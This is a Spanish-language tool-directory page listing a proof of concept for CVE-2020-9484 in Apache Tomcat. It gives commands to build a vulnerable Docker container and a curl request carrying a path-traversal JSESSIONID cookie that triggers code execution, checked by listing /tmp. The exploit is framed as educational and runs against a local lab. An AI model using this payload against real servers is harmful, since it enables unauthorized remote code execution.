Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-9484 | Kitploit
Herramientas/GitHubGitHub/masahiro331/cve-2020-9484
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubmasahiro331/cve-2020-9484

CVE-2020-9484

Ver Repositorio
12627hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-9484 (Tomcat)

Solo con fines educativos.

Consulte la Referencia para los detalles.

Ejecución

root@kitploit:~
$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ CONTAINER=`docker run -d -p 8080:8080 tomcat:groovy`

Verificación (limpio)

root@kitploit:~
$ docker exec -it $CONTAINER ls -la /tmp

NOTA: (rce NO está en la salida)

Explotación

root@kitploit:~
$ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

Verificación (explotado)

root@kitploit:~
$ docker exec -it $CONTAINER ls -la /tmp

NOTA: (rce SÍ está en la salida)

Descargar herramienta